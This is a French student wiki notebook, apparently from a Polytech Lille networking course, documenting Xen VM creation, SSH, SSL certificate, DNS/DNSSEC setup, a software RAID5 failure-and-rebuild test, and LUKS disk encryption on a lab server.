===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
                     &lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Création d'une machine virtuelle Xen sur Cordouan&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On commence par créer une machine virtuelle Xen sur le serveur de virtualisation cordouan.insecserv.deule.net. On se connecte tout d'abord en SSH sur le serveur cordouan.&lt;br /&gt;
&lt;br /&gt;
    1) ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
       Mot de passe: mot de passe root habituel&lt;br /&gt;
&lt;br /&gt;
On précise:&lt;br /&gt;
&lt;br /&gt;
* le nom de machine virtuelle: IMA5-BANANE&lt;br /&gt;
* son adresse IP sur le réseau: 193.48.57.179/28&lt;br /&gt;
* le répertoire où créer les disques virtuels: /usr/local/xen&lt;br /&gt;
* le miroir Debian: http://debian.polytech-lille.fr/debian&lt;br /&gt;
* la distribution: jessie (qui est la distribution stable courante)&lt;br /&gt;
&lt;br /&gt;
    2) xen-create-image --hostname=&amp;lt;IMA5-BANANE&amp;gt; --ip 193.48.57.179/28 --dir /usr/local/xen --netmask=255.255.255.240 --gateway=193.48.57.177 --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration de la machine virtuelle pour faire en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte. Installez les paquetages nécessaires pour SSH, le serveur Web apache2 et le serveur DNS bind (voir la partie services).&lt;br /&gt;
&lt;br /&gt;
    3) xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-home -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/IMA5-BANANE-var -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier de configuration en faisant en sorte que les répertoires var et home de la machine virtuelle soient sur des partitions LVM de l'hôte:&lt;br /&gt;
&lt;br /&gt;
* la mémoire attribuée: 512 Mo&lt;br /&gt;
* l'adresse ip de la MV: 193.48.57.179/28&lt;br /&gt;
* bridge: IMA5sc&lt;br /&gt;
&lt;br /&gt;
    4) xl list&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# xl list&lt;br /&gt;
       Name                                        ID   Mem VCPUs	State	Time(s)&lt;br /&gt;
       Domain-0                                     0  1993     8     r-----   52219.3&lt;br /&gt;
       karmeliett                                   1   128     1     -b----    2483.6&lt;br /&gt;
       duvel                                        2   512     1     -b----    4225.6&lt;br /&gt;
       deus                                         3   512     1     -b----    4226.4&lt;br /&gt;
       trappe                                       4   512     1     -b----    4082.4&lt;br /&gt;
       Rincecochon                                  6   512     1     -b----    3788.2&lt;br /&gt;
       IMA5-Durian                                 62   512     1     -b----    3237.7&lt;br /&gt;
       IMA5-BANANE                                 84   512     1     -b----     152.9&lt;br /&gt;
       IMA5-Papaye                                 89   512     1     -b----      35.4&lt;br /&gt;
       IMA5-Ananas                                 91   512     1     -b----      27.0&lt;br /&gt;
&lt;br /&gt;
On vérifie que la MV IMA5-BANANE a bien été créée.&lt;br /&gt;
&lt;br /&gt;
    5) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On lance IMA5-BANANE en utilisant le log root et le mot de passe configuré.&lt;br /&gt;
&lt;br /&gt;
Commandes de base pour démarrer la VM proprement: &lt;br /&gt;
&lt;br /&gt;
 ssh root@cordouan.insecserv.deule.net&lt;br /&gt;
 xl create /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
 ssh username@weppes&lt;br /&gt;
 ssh root@193.48.57.179&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Services Internet (SSH, DNS sécurisé et certificat SSL)&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
On configure à présent les services Internet après avoir acheté un nom de domaine (https://www.banane.space) sur gandi.net pour créer notre site Web sécurisé.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur SSH''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle, nous avons configuré le fichier sshd_config (PubkeyAuthentication ) :&lt;br /&gt;
&lt;br /&gt;
       root@IMA5-BANANE:~# vim /etc/ssh/sshd_config&lt;br /&gt;
       &lt;br /&gt;
       RSAAuthentication yes&lt;br /&gt;
       PubkeyAuthentication yes&lt;br /&gt;
       #AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
       PermitRootLogin yes&lt;br /&gt;
       &lt;br /&gt;
       root@IMA5-BANANE:~# service ssh restart&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Certification SSL''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
Nous commencons par acheter un certificat SSL. Puis, sur la VM nous générons le CSR grâce à cette commande:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# openssl req -nodes -newkey rsa:2048 -sha256 -keyout banane.key -out banane.csr&lt;br /&gt;
 Generating a 2048 bit RSA private key&lt;br /&gt;
 If you enter '.', the field will be left blank.&lt;br /&gt;
 -----&lt;br /&gt;
 Country Name (2 letter code) [AU]:FR&lt;br /&gt;
 State or Province Name (full name) [Some-State]:Nord&lt;br /&gt;
 Locality Name (eg, city) []:Lille&lt;br /&gt;
 Organization Name (eg, company) [Internet Widgits Pty Ltd]:PolytechLille&lt;br /&gt;
 Organizational Unit Name (eg, section) []:IMA&lt;br /&gt;
 Common Name (e.g. server FQDN or YOUR name) []:banane.space&lt;br /&gt;
 Email Address []:&lt;br /&gt;
 A challenge password []:&lt;br /&gt;
 An optional company name []:&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# ls banane.csr banane.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available/clef# cat banane.csr&lt;br /&gt;
 -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
 &amp;lt;CSR à renseigner sur Gandi lors de l'achat du certificat&amp;gt;&lt;br /&gt;
 -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Pour recevoir le mail contenant le lien pour activer le certificat, nous installons les packages suivants :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# apt-get install postfix mailx&lt;br /&gt;
&lt;br /&gt;
Une fois le certificat récupéré, nous les copions tous dans le bon répertoire, puis nous hashons le tout :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp certificat.crt /etc/ssl/certs/banane.space.crt&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp serveur.key /etc/ssl/private/banane.space.key&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# cp GandiStandardSSLCA2.pem /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
&lt;br /&gt;
Enfin, la dernière étape consiste en la modification des fichiers 000-banane.space-ssl.conf et ports.conf :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2/sites-available# cat 000-banane.space-ssl.conf &lt;br /&gt;
     &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerName www.banane.space&lt;br /&gt;
         ServerAlias banane.space&lt;br /&gt;
         DocumentRoot /var/www/&lt;br /&gt;
         CustomLog /var/log/apache2/secure_access.log combined&lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /etc/ssl/certs/banane.space.crt&lt;br /&gt;
         SSLCertificateKeyFile /etc/ssl/private/banane.space.key&lt;br /&gt;
         SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
         SSLVerifyClient None&lt;br /&gt;
     &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# cat ports.conf &lt;br /&gt;
 Listen 80&lt;br /&gt;
 &amp;lt;IfModule ssl_module&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
 &amp;lt;IfModule mod_gnutls.c&amp;gt;&lt;br /&gt;
 Listen 443&lt;br /&gt;
 &amp;lt;/IfModule&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Un redémarrage du service apache2 est maintenant nécessaire :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 stop&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 start&lt;br /&gt;
 root@IMA5-BANANE:/etc/apache2# service apache2 reload&lt;br /&gt;
&lt;br /&gt;
Nous pouvons voir que notre site est maintenant sécurisé, un cadenas vert est bien présent.&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''Serveur DNS''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
On commence par modifier les informations de notre nom de domaine sur le site de Gandi. Ensuite, dans ''&amp;quot;Gérer les Glue Records&amp;quot;'', nous modifions les informations concernant notre nom de domaine.&lt;br /&gt;
&lt;br /&gt;
* nom du serveur: ns.banane.space&lt;br /&gt;
* adresse IP: 193.48.57.179&lt;br /&gt;
* serveurs de nom:&lt;br /&gt;
** DNS1: ns.banane.space&lt;br /&gt;
** DNS2: ns6.gandi.net (serveur secondaire de Gandi)&lt;br /&gt;
&lt;br /&gt;
Une fois ces étapes effectuées, nous pouvons passer à la configuration du DNS avec bind. On se place alors dans le dossier /etc/bind de notre machine virtuelle.&lt;br /&gt;
Nous modifions dans un premier temps le fichier named.conf.local afin d'y créer nos zones :&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
 zone &amp;quot;banane.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.banane.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
On créée ensuite le fichier db.banane.space:&lt;br /&gt;
&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns.banane.space. root.banane.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns.banane.space. &lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns      IN      A       193.48.57.162&lt;br /&gt;
 www     IN      A       193.48.57.162&lt;br /&gt;
 @       IN      A       193.48.57.162&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
 search banane.space&lt;br /&gt;
 nameserver 193.48.57.162????&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=====&amp;lt;span style=&amp;quot;color:#6B8E23&amp;quot;&amp;gt;''DNS SEC''&amp;lt;/span&amp;gt;=====&lt;br /&gt;
&lt;br /&gt;
Génération des clefs asymétriques: &lt;br /&gt;
&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE banane.space&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE banane.space&lt;br /&gt;
&lt;br /&gt;
On modifie le nom des clefs: &lt;br /&gt;
&lt;br /&gt;
 /etc/bind/banane.space.dnssec# ls&lt;br /&gt;
 ????&lt;br /&gt;
&lt;br /&gt;
Nous signons ensuite les zones:&lt;br /&gt;
&lt;br /&gt;
dnssec-signzone -o banane.space -k banane.space-ksk &lt;br /&gt;
../db.banane.space banane.space-zsk&lt;br /&gt;
&lt;br /&gt;
Pour finir nous ajoutons la clef KSK sur Gandi avec l'algorithme RSA/SHA1.&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Sécurisation des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    1) vi /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-1 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-2 -v&lt;br /&gt;
       lvcreate -L 10G -n /dev/virtual/banane-3 -v&lt;br /&gt;
&lt;br /&gt;
       root@cordouan:~# cat /etc/xen/IMA5-BANANE.cfg&lt;br /&gt;
       #&lt;br /&gt;
       # Configuration file for the Xen instance IMA5-BANANE, created&lt;br /&gt;
       # by xen-tools 4.5 on Mon Sep 11 19:01:21 2017.&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Kernel + memory size&lt;br /&gt;
       #&lt;br /&gt;
       kernel      = '/boot/vmlinuz-3.16.0-4-amd64'&lt;br /&gt;
       extra       = 'elevator=noop'&lt;br /&gt;
       ramdisk     = '/boot/initrd.img-3.16.0-4-amd64'&lt;br /&gt;
       vcpus       = '1'&lt;br /&gt;
       memory      = '512'&lt;br /&gt;
       #&lt;br /&gt;
       #  Disk device(s).&lt;br /&gt;
       #&lt;br /&gt;
       root        = '/dev/xvda2 ro'&lt;br /&gt;
       disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/IMA5-BANANE/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/virtual/IMA5-BANANE-home,xvdb1,w',&lt;br /&gt;
  		  'phy:/dev/virtual/IMA5-BANANE-var,xvdc1,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-1,xvdd,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-2,xvde,w',&lt;br /&gt;
                  'phy:/dev/virtual/banane-3,xvdf,w',		 &lt;br /&gt;
       #&lt;br /&gt;
       #  Physical volumes&lt;br /&gt;
       #&lt;br /&gt;
       #&lt;br /&gt;
       #  Hostname&lt;br /&gt;
       #&lt;br /&gt;
       name        = 'IMA5-BANANE'  &lt;br /&gt;
       #&lt;br /&gt;
       #  Networking&lt;br /&gt;
       #&lt;br /&gt;
       vif         = [ 'ip=193.48.57.179/28 ,mac=00:16:3E:56:71:47,bridge=IMA5sc' ]       &lt;br /&gt;
       #&lt;br /&gt;
       #  Behaviour&lt;br /&gt;
       on_poweroff = 'destroy'&lt;br /&gt;
       on_reboot   = 'restart'&lt;br /&gt;
       on_crash    = 'restart'&lt;br /&gt;
&lt;br /&gt;
On reconfigure le fichier IMA5-BANANE.cfg en créant 3 nouvelles partitions LVM banane-X de 1 Go associées à notre VM.&lt;br /&gt;
&lt;br /&gt;
    2) xl console IMA5-BANANE&lt;br /&gt;
&lt;br /&gt;
On relance la MV IMA5-BANANE.&lt;br /&gt;
&lt;br /&gt;
    3) apt-get install mdadm&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite installé l paquetage mdadm puis rebooté la MV.&lt;br /&gt;
&lt;br /&gt;
    4) mdadm --create /dev/md0 --level=5 --assume-clean --raid-devices=3 /dev/xvdd /dev/xvde /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous créons le volume /dev/md0 pour créer un RAID5 logiciel avec les trois partitions obtenues. On sauvegarde ensuite la configuration actelle.&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --detail --scan &amp;gt;&amp;gt; /etc/mdadm/mdadm.conf&lt;br /&gt;
 root@IMA5-BANANE:~# mkfs /dev/md0&lt;br /&gt;
 root@IMA5-BANANE:~# mkdir /datamd0&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# mount /dev/md0 /datamd0/&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut éditer le fichier /etc/fstab en rajoutant la ligne suivante à la fin du fichier afin d'être sûr que la partition soit encore montée après le reboot:&lt;br /&gt;
 /dev/md0 /datamd0&lt;br /&gt;
&lt;br /&gt;
Nous créons un fichier texte sur le raid5:&lt;br /&gt;
 root@IMA5-BANANE:/datamd0# vim raid5test.txt&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Pour avoir le détail de la configuration actuelle:&lt;br /&gt;
&lt;br /&gt;
    5) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 3&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 17:03:20 2017&lt;br /&gt;
          State : clean &lt;br /&gt;
 Active Devices : 3&lt;br /&gt;
 Working Devices : 3&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 2&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0     202       48        0      active sync   /dev/xvdd&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    6) root@IMA5-BANANE:~# mdadm --detail /dev/md0&lt;br /&gt;
 /dev/md0:&lt;br /&gt;
        Version : 1.2&lt;br /&gt;
  Creation Time : Wed Oct 25 18:27:13 2017&lt;br /&gt;
     Raid Level : raid5&lt;br /&gt;
     Array Size : 2095104 (2046.34 MiB 2145.39 MB)&lt;br /&gt;
  Used Dev Size : 1047552 (1023.17 MiB 1072.69 MB)&lt;br /&gt;
   Raid Devices : 3&lt;br /&gt;
  Total Devices : 2&lt;br /&gt;
    Persistence : Superblock is persistent&lt;br /&gt;
    Update Time : Wed Oct 25 18:51:56 2017&lt;br /&gt;
          State : clean, degraded &lt;br /&gt;
 Active Devices : 2&lt;br /&gt;
 Working Devices : 2&lt;br /&gt;
 Failed Devices : 0&lt;br /&gt;
  Spare Devices : 0&lt;br /&gt;
         Layout : left-symmetric&lt;br /&gt;
     Chunk Size : 512K&lt;br /&gt;
           Name : IMA5-BANANE:0  (local to host IMA5-BANANE)&lt;br /&gt;
           UUID : b70ad336:fb198d84:a5909f1c:f4b33229&lt;br /&gt;
         Events : 12&lt;br /&gt;
    Number   Major   Minor   RaidDevice State&lt;br /&gt;
       0       0        0        0      removed&lt;br /&gt;
       1     202       64        1      active sync   /dev/xvde&lt;br /&gt;
       2     202       80        2      active sync   /dev/xvdf&lt;br /&gt;
&lt;br /&gt;
Nous arrêtons la MV, mettons en commentaire la 1ère partition dans le fichier de configuration, puis redémarrons la machine.&lt;br /&gt;
&lt;br /&gt;
On voit bien qu'une partition a été supprimée mais que le fichier créé auparavant est toujours présent:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# ls /datamd0/&lt;br /&gt;
 raid5test.txt&lt;br /&gt;
&lt;br /&gt;
Pour le test de réparation, afin de bien voir l'avancement de la reconstruction, nous avons procédé comme dans l'exemple du cours: Suppression de la partition xvdd:&lt;br /&gt;
&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --set-faulty /dev/md0 /dev/xvdd&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --remove /dev/md0 /dev/xvdd&lt;br /&gt;
 La partition est bien supprimée:&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
&lt;br /&gt;
On remet à présent la partition supprimée:&lt;br /&gt;
 root@IMA5-BANANE:~# mdadm --add /dev/md0 /dev/xvdd&lt;br /&gt;
&lt;br /&gt;
On essaie ensuite de remonter le RAID5 et on peut constater l'avancement de la reconstruction en lançant la même commande assez régulièrement:&lt;br /&gt;
&lt;br /&gt;
    7) root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.7% (627140/1047552) finish=0.2min speed=28506K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [============&amp;gt;........]  recovery = 64.5% (676392/1047552) finish=0.2min speed=29408K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 66.2% (695080/1047552) finish=0.2min speed=28961K/sec     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [=============&amp;gt;.......]  recovery = 68.1% (714664/1047552) finish=0.1min speed=28586K/sec&lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [_UU]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.6% (991996/1047552) finish=0.0min speed=29206K/sec   &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
 root@IMA5-BANANE:~# cat /proc/mdstat&lt;br /&gt;
 Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
 md0 : active raid5 xvdd[3] xvde[1] xvdf[2]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]     &lt;br /&gt;
 unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Cryptage des données&amp;lt;/span&amp;gt;====&lt;br /&gt;
&lt;br /&gt;
 cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
 cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
 mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
 mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
 vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose crypt_sd&lt;br /&gt;
&lt;br /&gt;
====&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en réseau de la MV Xen IMA5-BANANE&amp;lt;/span&amp;gt;====&lt;/div&gt;</summary>
		<author><name>Hdelatte</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46290</id>
		<title>Cahier 2017 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2017_groupe_n%C2%B05&amp;diff=46290"/>
				<updated>2017-11-17T09:02:23Z</updated>
		
		<summary type="html">&lt;p&gt;Hdelatte : /* Création d'une machine virtuelle Xen sur Cordouan */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Présentation générale'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Mise en contexte&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
Le projet de Réseau Avancé est composé d'une partie commune et d'une tâche particulière par binôme. Ce projet consiste en la configuration d'une architecture réseau avec différentes parties, en plus du câblage et de la configuration des routeurs et commutateurs.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
La partie commune consiste en la création et la mise en réseau d'une machine virtuelle; ainsi que la création d'un site sécurisé avec la configuration du serveur SSH, DNS sécurisé et du certificat SSL. La virtualisation permet de faire fonctionner sur une même machine plusieurs OS isolés ou des logiciels grâce aux machines virtuelles. Au-delà de la réduction des coûts, la virtualisation permet aussi de manipuler et gérer plus facilement des OS. Cependant, on s'oriente de plus en plus vers l'isolation par des conteneurs car ils permettent au sein d'un même OS, d'isoler les ressources matérielles et d'éviter des surcharges.&lt;br /&gt;
&lt;br /&gt;
Notre tâche particulière est donc de réaliser la gestion des conteneurs au sein d'une machine virtuelle configurée en réseau.&lt;br /&gt;
&lt;br /&gt;
===&amp;lt;span style=&amp;quot;color:#4169E1&amp;quot;&amp;gt;Tâches à effectuer&amp;lt;/span&amp;gt;===&lt;br /&gt;
&lt;br /&gt;
* Création d'une machine virtuelle sur le serveur de virtualisation Cordouan&lt;br /&gt;
* Mettre la machine virtuelle en réseau&lt;br /&gt;
* Configuration des services Internet (Serveur SSH, DNS, DNSSEC, Certificat SSL)&lt;br /&gt;
* Crackage de clé Wi-Fi&lt;br /&gt;
* Créer les différents conteneurs et configurer leur accès au réseau (tâche particulière)&lt;br /&gt;
&lt;br /&gt;
==&amp;lt;span style=&amp;quot;color:#000080&amp;quot;&amp;gt;'''Travail effectué'''&amp;lt;/span&amp;gt;==&lt;br /&gt;
